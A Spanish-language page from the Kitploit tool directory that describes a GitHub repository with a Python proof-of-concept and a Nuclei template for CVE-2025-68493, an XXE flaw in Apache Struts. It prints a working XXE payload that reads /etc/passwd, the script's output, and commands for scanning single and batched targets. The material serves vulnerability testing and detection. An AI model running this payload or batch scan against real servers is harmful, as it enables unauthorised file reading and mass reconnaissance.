Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-68493 — Python PoC script y plantilla YAML de Nuclei para detectar y explotar CVE-2025-68493, una vulnerabilidad XXE en Apache Struts, que permite la lectura de archivos y el escaneo por lotes. | Kitploit
Herramientas/GitHubGitHub/hsltz/cve-2025-68493
Escáneres de VulnerabilidadesAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de Penetración
GitHubhsltz/cve-2025-68493

CVE-2025-68493

Python PoC script y plantilla YAML de Nuclei para detectar y explotar CVE-2025-68493, una vulnerabilidad XXE en Apache Struts, que permite la lectura de archivos y el escaneo por lotes.

Ver Repositorio
21hace 7 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-68493

CVE-2025-68493

7. Referencias

[1] Vulnerabilidad ApacheStrutsXWorkXML CVE-2025-68493 PoC y script | ZONE.CI Red Global. https://zone.ci/secarticles/wx/486533.html

8. Verificación y explotación de la vulnerabilidad

Para verificar y explotar la vulnerabilidad CVE-2025-68493, se pueden usar el script Python PoC y la plantilla Nuclei YAML proporcionados a continuación.

8.1 Instrucciones de uso del script Python PoC

Nombre del script: cve_2025_68493_poc.py

Función: Este script se utiliza para la verificación de vulnerabilidades en un solo objetivo, intentando leer un archivo especificado (por defecto /etc/passwd).

Requisitos previos:

  • Entorno Python 3
  • Librería requests ()
pip install requests

Parámetros de línea de comandos:

  • -u, --url: URL base de la aplicación objetivo (por ejemplo: http://127.0.0.1:8080)
  • -f, --file: Ruta del archivo objetivo a leer (por defecto /etc/passwd)

Ejemplo:

root@kitploit:~
python3 cve_2025_68493_poc.py -u http://example.com:8080 -f /etc/passwd

Salida esperada:

Si el objetivo es vulnerable y el archivo se lee correctamente, se mostrará un contenido similar al siguiente:

root@kitploit:~
[*] Testing URL: http://example.com:8080/struts2-xml-parser/xmlParserNoDtdParse
[*] Payload: <?xml version="1.0"?><!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd">]> <foo>&xxe;</foo>
[+] Vulnerable! Successfully read /etc/passwd
----------------------------------------
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
----------------------------------------

8.2 Instrucciones de uso de la plantilla Nuclei YAML

Nombre de la plantilla: cve-2025-68493.yaml

Función: Esta plantilla se utiliza con la herramienta Nuclei para escanear múltiples objetivos en lote y detectar la vulnerabilidad CVE-2025-68493.

Requisitos previos:

  • Herramienta Nuclei instalada (se recomienda v3.x o superior)

Parámetros de línea de comandos:

  • -t: Ruta del archivo de la plantilla Nuclei
  • -u: URL de un solo objetivo
  • -l: Archivo que contiene las URLs de múltiples objetivos

Ejemplo:

Escaneo de un solo objetivo:

root@kitploit:~
nuclei -t cve-2025-68493.yaml -u http://example.com:8080

Escaneo por lotes:

Suponiendo que tiene un archivo llamado targets.txt, donde cada línea contiene una URL de destino:

root@kitploit:~
http://target1.com:8080
http://target2.com:8080

Ejecute el siguiente comando para el escaneo por lotes:

root@kitploit:~
nuclei -t cve-2025-68493.yaml -l targets.txt
Descargar herramienta